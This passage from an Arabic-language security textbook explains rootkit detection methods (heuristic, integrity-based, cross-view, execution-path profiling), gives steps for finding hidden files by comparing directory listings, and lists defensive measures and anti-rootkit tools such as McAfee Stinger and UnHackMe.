‫أﯾﺿﺎ ﺑﺎﺳم اﻟﻛﺷف ﻋن اﻟﺳﻠوﻛﯾﺎت)‪ Heuristic detection . (behavioral detection‬ﻗﺎدر ﻋﻠﻰ ﺗﺣدﯾد اﻟروت ﻛت اﻟﺟدﯾدة‪ ،‬اﻟﻣﺟﮭوﻟﺔ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪445‬‬

‫ﺳﺎﺑﻘﺎ‪ .‬ھذه اﻟﻘدرة ﺗﻛﻣن ﻓﻲ ﻛوﻧﮫ ﻗﺎدرا ﻋﻠﻰ اﻟﺗﻌرف ﻋﻠﻰ اﻻﻧﺣراﻓﺎت ﻓﻲ أﻧﻣﺎط ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻌﺎدﯾﺔ أو اﻟﺳﻠوﻛﯾﺎت‪ .‬ﺗﻧﻔﯾذ ‪path hooking‬‬
‫ھو أﺣد اﻷﺷﯾﺎء اﻟﺗﻲ ﺗﺳﺑب اﻧﺣراﻓﺎت ﻓﻲ اﻟﺳﻠوك واﻟﺗﻲ ﺗﺳﺑب اﻟﻛﺷف اﻟﻘﺎﺋم ﻋﻠﻰ ‪ heuristic‬ﻟﺗﺣدﯾد اﻟروت ﻛت‪.‬‬
‫‪Integrity-based Detection‬‬
‫ﺗﺗﻣﺛل وظﯾﻔﺔ ‪ Integrity-based detection‬ﻋﻠﻰ اﻟﻣﻘﺎرﻧﺔ ﺑﯾن ﻣﻠﻔﺎت اﻟﻧظﺎم اﻟﺣﺎﻟﻲ وﺳﺟﻼت اﻟﺗﻣﮭﯾد)‪ ، (boot record‬أو ﺻوره ﻣن‬
‫اﻟذاﻛرة ﻣﻊ ﻗواﻋد أﺳﺎﺳﯾﮫ )‪ (base-line‬وﻣوﺛوق ﻓﯾﮭﺎ وﻣﻌروﻓﮫ‪ .‬اﻷدﻟﺔ ﻋﻠﻰ وﺟود أي ﻧﺷﺎط ﺿﺎر ﯾﻣﻛن أن ﯾﻼﺣظ ﻣن ﻗﺑل اﻻﺧﺗﻼف ﺑﯾن‬
‫ﻟﻘطﺎت اﻟﺣﺎﻟﯾﺔ واﻟﻘواﻋد اﻷﺳﺎﺳﯾﺔ‪.‬‬
‫‪Cross-view-based Detection‬‬
‫ﺗﺗﻣﺛل وظﯾﻔﺔ ﺗﻘﻧﯾﺔ ‪ Cross-view-based detection‬ﻋﻠﻰ اﻓﺗراض أن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻗد ﺗم ﺗﺧرﯾﺑﮫ ﻣن ﺧﻼل ﺑﻌض اﻟطرﯾﻖ‪ .‬ھذا ﯾﻘوم‬
‫ﺑﺗﻌداد ﻣﻠﻔﺎت اﻟﻧظﺎم واﻟﻌﻣﻠﯾﺎت وﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻋن طرﯾﻖ اﺳﺗدﻋﺎء ‪ .APls‬ﺛم ﺗﺗم ﻣﻘﺎرﻧﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﻣﻊ ﻣﺟﻣوﻋﺔ اﻟﺑﯾﺎﻧﺎت‬
‫اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﺧﻼل اﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗﻌﺑر ﻣن ﺧﻼل ﻧﻔس اﻟﺑﯾﺎﻧﺎت‪ .‬ﺗﻌﺗﻣد ھذه اﻟﺗﻘﻧﯾﺔ ﻋﻠﻰ ﺣﻘﯾﻘﺔ أن ‪ Hooking API‬أو‬
‫اﻟﺗﻼﻋب ﻓﻲ ﺑﻧﯾﺔ ﺑﯾﺎﻧﺎت اﻟﻛﯾرﻧل ﯾؤدى اﻟﻰ إﻓﺳﺎد اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم إرﺟﺎﻋﮭﺎ ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل ‪ ،APls‬ﻣﻊ آﻟﯾﺎت اﻟﻣﺳﺗوى اﻟﻣﻧﺧﻔض‬
‫ﺗﺳﺗﺧدم ﻹﻧﺗﺎج ﻧﻔس اﻟﻣﻌﻠوﻣﺎت ﻣﺟﺎﻧﺎ ﻣن ‪ DKOM‬أو ‪.hook manipulation‬‬
‫‪Runtime Execution Path Profiling‬‬
‫ﺗﻘﻧﯾﺔ ‪ Runtime Execution Path Profiling‬ﺗﻘﺎرن ﺑﯾن ‪ Runtime Execution Path Profiling‬ﻟﺟﻣﯾﻊ ﻋﻣﻠﯾﺎت اﻟﻧظﺎم‬
‫واﻟﻣﻠﻔﺎت اﻟﻘﺎﺑﻠﺔ ﻟﻠﺗﻧﻔﯾذ‪ .‬اﻟروت ﻛت ﯾﺿﯾف اﻷﻛواد اﻟﺟدﯾد ﺑﺎﻟﻘرب ﻣن ﻣﺳﺎر ﺗﻧﻔﯾذ روﺗﯾن ﻣﻌﯾن‪ ،‬ﺑﻐﯾﺔ زﻋزﻋﺔ اﺳﺗﻘرارھﺎ‪ .‬ﻋدد اﻟﺗﻌﻠﯾﻣﺎت‬
‫اﻟﻣﻧﻔذة ﻗﺑل وﺑﻌد اﻟروﺗﯾن ﻣﻌﯾن ﯾﺗم اﺻطﯾﺎدھﺎ )‪ (hooked‬وﺗﻛون ﻣﺧﺗﻠﻔﺔ إﻟﻰ ﺣد ﻛﺑﯾر‪.‬‬

‫اﻟﺧطوات ﻻﻛﺗﺷﺎف اﻟروت ﻛت ‪Steps For Detecting Rootkits‬‬


‫اﻟﻣﺻدر‪http://research.microsoft.com/ :‬‬
‫ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ ﻟﻠﻛﺷف ﻋن اﻟروت ﻛت‪:‬‬
‫‪ -1‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﻷواﻣر اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺻﺎب ﺛم ﺣﻔظ اﻟﻧﺗﺎﺋﺞ‪.‬‬
‫‪dir /s /b /ah‬‬
‫‪dir /s /b /a-h‬‬
‫‪ -2‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﻟﻧظﺎم ﻣن ﺧﻼل أﺳطواﻧﺔ ﺗﺷﻐﯾل ﻏﯾر ﻣﺻﺎﺑﮫ )‪(Boot into a clean CD‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل اﻷواﻣر اﻟﺗﺎﻟﯾﺔ ﺛم ﺣﻔظ‬
‫اﻟﻧﺗﺎﺋﺞ ﻓﻲ ﻣﻠف‪.‬‬
‫‪dir /s /b /ah‬‬
‫‪dir /s /b /a-h‬‬
‫‪ -3‬ﻧﻘوم ﺑﺗﺷﻐﯾل اﺻدار ﻏﯾر ﻣﺻﺎب ﻣن ‪ WinDiff‬ﻣن ﺧﻼل أﺳطواﻧﺔ ﺗﺷﻐﯾل ‪ CD‬ﻋﻠﻰ ﻧﺗﺎﺋﺞ اﻟﺧطوﺗﯾن اﻟﺳﺎﺑﻘﺗﯾن ﻻﻛﺗﺷﺎف اﻟﻣﻠﻔﺎت‬
‫اﻟﻣﺧﻔﺎة‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﯾﻣﻛن أن ﯾﻛون ھﻧﺎك ﺑﻌض اﻟﻧﺗﺎﺋﺞ اﻟﻛﺎذﺑﺔ‪ .‬أﯾﺿﺎ‪ ،‬ھذا ﻻ ﯾﻛﺷف ﻋن ‪ stealth software‬اﻟذي ﯾﺧﻔﻲ ﻓﻲ ‪ ،BIOS‬ﺑطﺎﻗﺔ اﻟﻔﯾدﯾو‬
‫‪ ،EEPROM‬ﻗطﺎﻋﺎت اﻟﻘرص ﺳﯾﺋﺔ)‪ ، (bad disk sector‬واﻟﺟداول اﻟﺑدﯾﻠﺔ ﻟﻠﺑﯾﺎﻧﺎت‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪446‬‬

‫‪Defending Against Rootkits‬‬


‫ﻣن اﻟﻣﮭم أن ﻧﻔﮭم أﻧﮫ ﻣن أﺟل ﺗﻛوﯾن وﺗﺛﺑﯾت اﻟروت ﻛت‪ ،‬ﻓﺎﻧﮫ ﺑﺗطﻠب اﻟوﺻول اﻹداري إﻟﻰ اﻟﻧظﺎم اﻟﮭدف‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺎن اﻟﺧطوة اﻷوﻟﻰ ھﻲ‬
‫اﻟﮭﺟوم اﻟذي ﯾؤدي إﻟﻰ ھذا اﻟوﺻول وﻟﻛﻧﮫ ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﯾﻛون ﺻﺎﺧﺑﺎ وﯾﺳﮭل ﻛﺷﻔﮫ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن اﻟﺧطوة اﻷوﻟﻰ ﻓﻲ ﺗﺟﻧب اﻟروت‬
‫ھو ﺗﻘﻠﯾل اﻟﺻﻼﺣﯾﺎت ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن‪ .‬ھﻧﺎك ﻋدد ﻗﻠﯾل ﺟدا ﻣن اﻟﻣﺷروﻋﺎت اﻟﺗﻲ ﯾﺳﻣﺢ ﻓﯾﮭﺎ ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﺗﺷﻐﯾل ﻣﻊ ﺣﻘوق اﻟﻣﺳؤول‬
‫اﻟﻛﺎﻣل‪ .‬ﻟذﻟك اﻻن ﯾوﻓر ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﺣدﯾﺛﺔ اﻟﻘدرة ﻋﻠﻰ رﻓﻊ اﻻﻣﺗﯾﺎزات ﻣؤﻗﺗﺎ ﻣﻊ اﻻواﻣر " ‪ " su‬أو " ‪run as‬‬
‫‪."administrator‬‬

‫ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻌدﯾد ﻣن وظﯾﻔﺔ اﻟروت ﻛت ﺗﻛون ﻋﻠﻰ ﻣﺳﺗوى اﻟﻛﯾرﻧل وﻟﮭﺎ اﻟﻘدرة ﻋﻠﻰ ﺗﺟﻧب اﻟﻛﺷف ﻋن طرﯾﻖ ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ‬
‫اﻟﻔﯾروﺳﺎت‪ ،‬ﻟذﻟك ﻓﺎن ﺗرﻛﯾب واﺳﺗﺧدام وﺣﻔظ اﻟﺑرﻧﺎﻣﺞ ﻣﺣدﺛﮫ اﻟﻰ ﻣﺎ ﯾﺻل إﻟﻰ ﺗﺎرﯾﺦ اﻟﯾوم أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ‪ .‬ﺑﻌض اﻟروت ﻛت‪ ،‬وﺧﺻوﺻﺎ‬
‫اﻹﺻدارات اﻟﻘدﯾﻣﺔ واﻷﻗل ﺗﻌﻘﯾدا ﻣﻧﮭﺎ‪ ،‬ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ وﺗﻧظﯾﻔﮭﺎ ﻣن ﻗﺑل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻟﺣدﯾﺛﺔ‪.‬‬
‫ﻣن اﻟﻣﮭم أﯾﺿﺎ ﻣراﻗﺑﺔ ﺣرﻛﺔ اﻟﻣرور اﻟﻘﺎدﻣﺔ اﻟﻰ واﻟﺧروج ﻣن اﻟﺷﺑﻛﺔ‪ .‬اﻟﻌدﯾد ﻣن اﻟﻣﺳؤوﻟﯾن ﯾﻛون ﻣﮭﺗﻣﯾن ﺑرﺻد وﻋرﻗﻠﺔ ﺣرﻛﺔ اﻟﻣرور‬
‫واﻟﺗﻲ ﺗﺻب ﻓﻲ اﻟﺷﺑﻛﺔ‪ .‬اﻧﮭم ﯾﻘﺿون اﻷﯾﺎم وﺣﺗﻰ أﺳﺎﺑﯾﻊ ﻟﺗﺣدﯾد وﻣﻧﻊ ﺣرﻛﺔ اﻟﻣرور اﻟواردة‪ .‬ﻓﻲ ﻧﻔس اﻟوﻗت‪ ،‬ﻛﺛﯾر ﻣن ھؤﻻء اﻟﻣﺳﺋوﻟﯾن‬
‫ﯾﺗﺟﺎھﻠوا ﺗﻣﺎﻣﺎ ﻛل ﺣرﻛﺔ اﻟﻣرور اﻟﺻﺎدرة‪ .‬رﺻد ﺣرﻛﺔ اﻟﻣرور اﻟﺻﺎدرة ﯾﻌﺗﺑر أﻣرا ﺣﯾوﯾﺎ ﻓﻲ اﻟﻛﺷف ﻋن اﻟروت ﻛت وﻏﯾرھﺎ ﻣن اﻟﺑراﻣﺞ‬
‫اﻟﺿﺎرة‪ .‬ﯾﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ ﻟﻣﻌرﻓﺔ اﻟﻣزﯾد ﻋن ﺗﺻﻔﯾﺔ اﻟﺧروج‪.‬‬

‫ﺗﻛﺗﯾك أﺧر ﺟﯾد ﻟﻠﻛﺷف ﻋن اﻟروت ﻛت و‪ backdoor‬ھو اﻟﻔﺣص ﺑﺎﻧﺗظﺎم ﻟﻣﻧﺎﻓذ اﻟﻧظم اﻟﺧﺎﺻﺔ ﺑك‪ .‬إذا وﺟدت ﺑﻌض ﻣن ﻣﻧﺎﻓذ اﻟﻧظﺎم اﻟﻐﯾر‬
‫ﻣﻌروﻓﮫ ﻣﻔﺗوﺣﺔ‪ ،‬ﺗﺄﻛد ﻣن ﺗﻌﻘب أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺷﺧﺻﯾﺔ وﺗﺣدﯾد اﻟﺧدﻣﺔ اﻟﻣﺎرﻗﺔ‪ .‬أﯾﺿﺎ ﻣن ﺑﻌض اﻟﺗﻘﻧﯾﺎت اﻟﻐﻧﯾﺔ ﻋن اﻟﺗﻌرﯾف ھﻲ ﺗﺣﻠﯾل‬
‫ﻣﻠف اﻟﺳﺟل واﻟﺗﻲ ﺗﻌﺗﺑر ﺟزءا ً ﻣﮭﻣﺎ ﻣن إدارة اﻟﻣﺧﺎطر‪ .‬ﻗد ﯾﻣﻠك اﻟﻣﮭﺎﺟم أﯾﺿﺎ ﺑراﻣﺞ اﻟﻧﺻﯾﺔ )‪ (shell script‬أو أدوات واﻟﺗﻲ ﯾﻣﻛن أن‬
‫ﺗﺳﺎﻋده ﻋﻠﻰ ﺗﻐطﯾﺗﮫ أو ﺗﻐطﯾﺔ ﻣﺳﺎرات اﻟﮭﺟوم‪ ،‬وﻟﻛن ﺑﺎﻟﺗﺄﻛﯾد ﺳوف ﯾﻛون ھﻧﺎك ﻋﻼﻣﺎت ﻣﻧﺑﮭﺔ أﺧرى ﯾﻣﻛن أن ﺗؤدي إﻟﻰ ﺗداﺑﯾر ﻣﺿﺎدة‬
‫اﺳﺗﺑﺎﻗﯾﺔ‪ ،‬وﻟﯾﺳت ﻣﺟرد رد اﻟﻔﻌل‪.‬‬

‫اﻟﺗدﺑﯾر اﻟﻣﺿﺎد ھو رد اﻟﻔﻌل ﻟﻠﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ ﻟﻛﺎﻓﺔ اﻟﺑﯾﺎﻧﺎت اﻟﮭﺎﻣﺔ ﺑﺎﺳﺗﺛﻧﺎء ‪ ،binaries‬واﻟذھﺎب ﻹﺟراء ﺗﺛﺑﯾت ﻧظﯾف ﻣن ﻣﺻدر ﻣوﺛوق‬
‫ﺑﮫ‪ .‬ﯾﻣﻛن ﻟﻠﻣرء اﻧﺷﺎء ﻣﻠﺧص ﻟﻔﺣص اﻷﻛواد واﻟﺗﻲ ﺗﻌﺗﺑر ﻛوﺳﯾﻠﺔ ﻟﻠدﻓﺎع ﺟﯾدة ﺿد أدوات ﻣﺛل اﻟروت ﻛت‪ MD5sum.exe .‬ﯾﻣﻛﻧﮫ اﻧﺷﺎء‬
‫ﺑﺻﻣﺔ ﻟﻠﻣﻠﻔﺎت وذﻟك ﻟﻣﻼﺣظﮫ أي ﻣن اﻻﻧﺗﮭﺎﻛﺎت ﻋﻧد ﺣدوث أي ﻣن اﻟﺗﻐﯾﯾرات‪ .‬ﻟﻠدﻓﺎع ﺿد اﻟروت ﻛت‪ ،‬ﯾﻣﻛن اﺳﺗﺧدام ﺑراﻣﺞ ﻓﺣص ﺳﻼﻣﺔ‬
‫ﻣﻠﻔﺎت اﻟﻧظﺎم اﻟﮭﺎﻣﺔ‪ .‬ﺣﯾث ﺗﺗوﻓر اﻟﻌدﯾد ﻣن اﻷدوات واﻟﺑراﻣﺞ واﻟﺑرﻣﺟﯾﺎت واﻟﺗﻘﻧﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ ﻟﻠﺗﺣﻘﻖ ﻣن اﻟروت ﻛت‪.‬‬

‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﺗم اﻋﺗﻣﺎدھﺎ ﻟﻠدﻓﺎع ﺿد اﻟروت ﻛت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫إﻋﺎدة ﺗﺛﺑﯾت ﻧظﺎم اﻟﺗﺷﻐﯾل‪/‬اﻟﺗطﺑﯾﻘﺎت ﻣن ﻣﺻدر ﻣوﺛوق ﺑﻌد اﻟﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ ﻟﻠﺑﯾﺎﻧﺎت اﻟﮭﺎﻣﺔ‪.‬‬ ‫‪-‬‬
‫ﺗﺣدﯾد اﻟﻣوظﻔﯾن ذوي اﻟﻣﺳؤوﻟﯾﺎت اﻟﻐﯾر ﻣﺣدودة‪.‬‬ ‫‪-‬‬
‫إﺟراءات اﻟﺗﺛﺑﯾت اﻵﻟﻲ ﻣوﺛﻘﺔ ﺗوﺛﯾﻘﺎ ً ﺟﯾدا ﺑﺣﺎﺟﺔ إﻟﻰ أن ﯾﺗم اﻟﺣﻔﺎظ ﻋﻠﯾﮭﺎ‪.‬‬ ‫‪-‬‬
‫ﺗﺛﺑﯾت ﺷﺑﻛﺔ اﻻﺗﺻﺎل واﻟﺿﯾﻔﯾن ﻣﺳﺗﻧدا إﻟﻰ ﺟدران اﻟﺣﻣﺎﯾﺔ‪.‬‬ ‫‪-‬‬
‫اﺳﺗﺧدام ﻧظﺎم ﻣﺻﺎدﻗﺔ ﻗوي‪.‬‬ ‫‪-‬‬
‫اﻟﻣﺗﺟر اﻟﺗواﻓر ﻻﺳﺗﻌﺎدة ﺛﻘﺔ وﺳﺎﺋل اﻹﻋﻼم‬ ‫‪-‬‬
‫زﯾﺎدة اﻷﻣﺎن وﺗﺻﻌﯾب ﻣﺣطﺔ اﻟﻌﻣل أو اﻟﻣﻠﻘم ﺿد اﻟﮭﺟوم‪.‬‬ ‫‪-‬‬
‫ﺗﺣدﯾث ‪ patches‬ﻟﻧظم اﻟﺗﺷﻐﯾل واﻟﺗطﺑﯾﻘﺎت‪.‬‬ ‫‪-‬‬
‫ﯾﺟب ﺗﺣدﯾث ﺑرﻣﺟﯾﺎت اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﻔﯾروﺳﺎت وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﺑﺎﻧﺗظﺎم‪.‬‬ ‫‪-‬‬
‫ﯾﺟب ﻋدم ﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻏﯾر اﻟﺿرورﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك وأﯾﺿﺎ ﺗﻌطﯾل اﻟﻣﯾزات واﻟﺧدﻣﺎت اﻟﺗﻲ ﻟﯾس ﻟﮭﺎ اﺳﺗﺧدام‪.‬‬ ‫‪-‬‬
‫ﯾﺟب اﻟﺗﺣﻘﻖ ﻣن ﺳﻼﻣﺔ ﻣﻠﻔﺎت اﻟﻧظﺎم ﺑﺷﻛل ﻣﻧﺗظم ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر اﻟﺑﺻﻣﺔ اﻟرﻗﻣﯾﺔ اﻟﻘوى‪.‬‬ ‫‪-‬‬
‫اﻟﺗﺄﻛد ﻣن أن ﺑرﻧﺎﻣﺞ اﻟﺣﻣﺎﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت اﻟذي ﺗم اﺧﺗﯾﺎره ﺗﻣﺗﻠك ﺣﻣﺎﯾﺔ ﺿد اﻟروت ﻛت ﻗﺑل ﺗﺛﺑﯾﺗﮫ‪.‬‬ ‫‪-‬‬
‫ﯾﺟب ﺗﺟﻧب ﺗﺳﺟﯾل اﻟدﺧول ﺑﺣﺳﺎب ﻟﮫ اﻣﺗﯾﺎزات إدارﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﯾﻧﺑﻐﻲ اﻟﺗﻣﺳك ﺑﻣﺑدأ اﻻﻣﺗﯾﺎزات اﻷﻗل‪.‬‬ ‫‪-‬‬

‫أدوات ﻣﺛل ‪ ،Vice ،Rootkit Revealer‬و‪F-Secure’s Backlight‬ھﻲ ﺑﻌض اﻟﺧﯾﺎرات اﻟﻛﺑﯾرة اﻟﺣر ﻟﻠﻛﺷف ﻋن وﺟود اﻟﻣﻠﻔﺎت‬
‫واﻟروت ﻛت اﻟﺧﻔﯾﺔ‪ .‬ﻟﻸﺳف‪ ،‬ﺑﻣﺟرد ﺗﺛﺑﯾت اﻟروت ﻛت‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أن ﯾﻛون ﻣن اﻟﺻﻌب ﺟدا إزاﻟﺗﮫ‪ ،‬أو ﻋﻠﻰ اﻷﻗل إزاﻟﺔ ﺗﻣﺎﻣﺎ‪ .‬ﻓﻲ ﺑﻌض‬
‫اﻷﺣﯾﺎن‪ ،‬ﻹزاﻟﺔ اﻟروت ﻛت ﯾﺗطﻠب ﻣﻧك ﺗﺷﻐﯾل اﻟﺟﮭﺎز ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل أﺧر ﻣﻘﺎرن و‪ mount‬ﻗرص اﻟﺻﻠب اﻷﺻﻠﻲ‪ .‬ﺑواﺳطﺔ‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪447‬‬

‫إﻋﺎدة ﺗﺷﻐﯾل ﺟﮭﺎزك إﻟﻰ ﻧظﺎم ﺗﺷﻐﯾل اﻟﺑدﯾل أو ﺗرﻛﯾب ﻣﺣرك اﻷﻗراص إﻟﻰ ﺟﮭﺎز آﺧر‪ ،‬ﯾﻣﻛﻧك ﻓﺣص ﻣﺣرك اﻷﻗراص أﻛﺛر ﺷﻣوﻻ‪ .‬ﻷن‬
‫ﻧظﺎم اﻟﺗﺷﻐﯾل اﻷﺻﻠﻲ ﻟن ﯾﻛون ﻗﯾد اﻟﺗﺷﻐﯾل وأﯾﺿﺎ ﻋﻣﻠﯾﺔ اﻟﻔﺣص ﻟن ﯾﺗطﻠب اﺳﺗدﻋﺎء ‪ API‬ﻣن اﻟﻧظﺎم اﻟﻣﺻﺎب‪ ،‬ﻓﻣن اﻷرﺟﺢ أﻧك ﺳوف‬
‫ﺗﻛون ﻗﺎدرة ﻋﻠﻰ اﻛﺗﺷﺎف وإزاﻟﺔ اﻟروت ﻛت‪ .‬ﺣﺗﻰ ﻣﻊ ﻛل ھذا‪ ،‬ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﻓﺎن أﻓﺿل ﺷﻲء ﺣﺗﻰ ﻣﻊ ﻓﺣص اﻟﻧظﺎم ھو ﺑﺑﺳﺎطﺔ‪،‬‬
‫اﻟﻔرﻣﺗﺔ ﺑﺷﻛل ﻛﺎﻣل‪ ،‬واﻟﺑدء ﻣن ﺟدﯾد‪.‬‬

‫‪Anti-Rootkit: Stinger‬‬
‫اﻟﻣﺻدر‪http://www.mcafee.com/us :‬‬
‫‪ McAfee Stinger‬ﯾﺳﺎﻋدك ﻋﻠﻰ اﻛﺗﺷﺎف وإزاﻟﺔ اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ذات اﻻﻧﺗﺷﺎر ‪ ،‬واﻟﻔﯾروﺳﺎت‪ ،‬واﻟﺗﮭدﯾدات اﻟﻣﺣددة ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص‬
‫ﺑك‪ Stinger .‬ﯾﻘوم ﺑﻔﺣص اﻟروت ﻛت‪ ،‬واﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ‪ ،‬وﺣدات ﺗﺣﻣﯾل‪ ،‬اﻟﺗﺳﺟﯾل‪ ،‬ودﻟﯾل اﻟﻣواﻗﻊ اﻟﻣﻌروﻓﺔ ﻻﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﺑراﻣﺞ‬
‫اﻟﺿﺎرة ﻋﻠﻰ اﻟﺟﮭﺎز ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟﺣد اﻷدﻧﻰ ﻣن ﻣرات اﻟﻔﺣص‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ إﺻﻼح اﻟﻣﻠﻔﺎت اﻟﻣﺻﺎﺑﺔ اﻟﺗﻲ وﺟدت ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص‬
‫ﺑك‪ .‬ﯾﻛﺷف وﯾﻌطل ﻛل اﻟﻔﯾروﺳﺎت ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬

‫‪Anti-Rootkit: UnHackMe‬‬
‫اﻟﻣﺻدر‪http://www.greatis.com :‬‬
‫‪ UnHackMe‬ھو ﻓﻲ اﻷﺳﺎس ﺑرﻧﺎﻣﺞ ﻟﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت واﻟذى ﯾﺳﺎﻋدك ﻓﻲ ﺗﺣدﯾد وإزاﻟﺔ ﺟﻣﯾﻊ أﻧواع اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل اﻟروت ﻛت ‪،‬‬
‫واﻟﺗرواﺟن‪ ،‬و‪ ،worms‬واﻟﻔﯾروﺳﺎت‪ ،‬وھﻠم ﺟرا‪ .‬اﻟﻐرض اﻟرﺋﯾﺳﻲ ﻣن ‪ UnHackMe‬ھو ﻣﻧﻊ اﻟروت ﻛت ﻣن إﯾذاء ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‬
‫اﻟﺧﺎص ﺑك‪ ،‬ﻣﻣﺎ ﯾﺳﺎﻋد اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺣﻣﺎﯾﺔ أﻧﻔﺳﮭم ﺿد اﻟﺗﺳﻠل وﺳرﻗﺔ اﻟﺑﯾﺎﻧﺎت‪ .‬ﯾﺗﺿﻣن ‪ UnHackMe‬أﯾﺿﺎ ﻣﯾزة ‪،Reanimator‬‬
‫واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺟراء ﻓﺣص ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻛﺎﻣﻼ‪.‬‬
‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬دﻗﺔ اﻟﻔﺣص اﻟﻣزدوج ﻟﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﯾﺳﺗﻧد إﻟﻰ ‪.Windows‬‬
‫‪ -‬ﺗﺗﺑﻊ اﻟﺷﯾﻔرات اﻟﺧﺑﯾﺛﺔ ﻓﻲ اﻟﻧظﺎم )اﻟروت ﻛت‪ ،‬واﻟﺗرواﺟن‪ ،‬و‪ ،worms‬واﻟﻔﯾروﺳﺎت‪ ،‬وھﻠم ﺟرا(‬
‫‪ -‬ﻻ ﯾﺑطﺊ اﻟﻛﻣﺑﯾوﺗر وأﻧﮫ ﻣﺗواﻓﻖ ﻣﻊ ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪448‬‬

‫‪Anti-Rootkit: Other Tools‬‬


‫ﺗطﺑﯾﻘﺎت ﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت اﻟﺗﺎﻟﯾﺔ ﺗﺳﺎﻋدك ﻋﻠﻰ إزاﻟﺔ اﻷﻧواع اﻟﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل اﻟروت ﻛت‪ ،‬واﻟﻔﯾروﺳﺎت‪ ،‬طروادة‪،‬‬
‫واﻟدﯾدان ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﯾﻣﻛﻧك ﺗﺣﻣﯾل أو ﺷراء ﺑرﻧﺎﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت ﻣن ﻣواﻗﻊ اﻟداﺧل وﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص‬
